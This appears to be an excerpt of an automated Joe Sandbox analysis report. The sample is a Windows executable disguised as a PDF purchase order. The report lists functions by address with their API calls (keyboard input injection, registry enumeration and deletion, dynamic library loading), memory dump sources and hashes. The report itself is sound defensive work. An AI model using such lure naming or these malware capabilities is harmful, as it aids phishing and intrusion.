                                                                                                                                                                                                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CurrentHandleProcess$Duplicate
                                                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                                                            • API String ID: 2124370227-2873401336
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                                                                                                                                                                                                            • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                                                                                                                                                                                                                                                            Function 004412AE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                                            • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                            • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                                            • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                                                                                                                                                                                                            • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                                                                                                                                                                                                                                                            Function 00443009 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 0044308B
                                                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00443096
                                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                                            • API String ID: 1795658109-438819550
                                                                                                                                                                                                                                                                                                            • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                                                                                                                                                                                                            • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                                                                                                                                                                                                                                                            Function 004609BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 004609EF
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                                                                                                                                                                                                                                                            • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00460A7A
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: %s%d
                                                                                                                                                                                                                                                                                                            • API String ID: 991886796-1110647743
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                                                                                                                                                                                                            • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                                                                                                                                                                                                                                                            Function 0040F790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _memset$_sprintf
                                                                                                                                                                                                                                                                                                            • String ID: %02X
                                                                                                                                                                                                                                                                                                            • API String ID: 891462717-436463671
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                                                                                                                                                                                                            • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                                                                                                                                                                                                                                                            Function 0040F3B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0042CD00
                                                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,?,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,004A8E80,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                                                                                                                                                                                                            • String ID: $OH$@OH$X
                                                                                                                                                                                                                                                                                                            • API String ID: 3491138722-1394974532
                                                                                                                                                                                                                                                                                                            • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                                                                                                                                                                                                            • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                                                                                                                                                                                                                                            Function 00463D7E Relevance: 7.6, APIs: 5, Instructions: 141libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2449869053-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                                                                                                                                                                                                                                                            Function 0044C379 Relevance: 7.6, APIs: 5, Instructions: 137windowkeyboardCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                                                                                                                                                                                                                                            • SendInput.USER32 ref: 0044C509
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3031425849-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                                                                                                                                                                                                            • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                                                                                                                                                                                                                                                            Function 004422B9 Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Enum$CloseDeleteOpen
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2095303065-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                                                                                                                                                                                                            • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                                                                                                                                                                                                                                            Function 0045C277 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
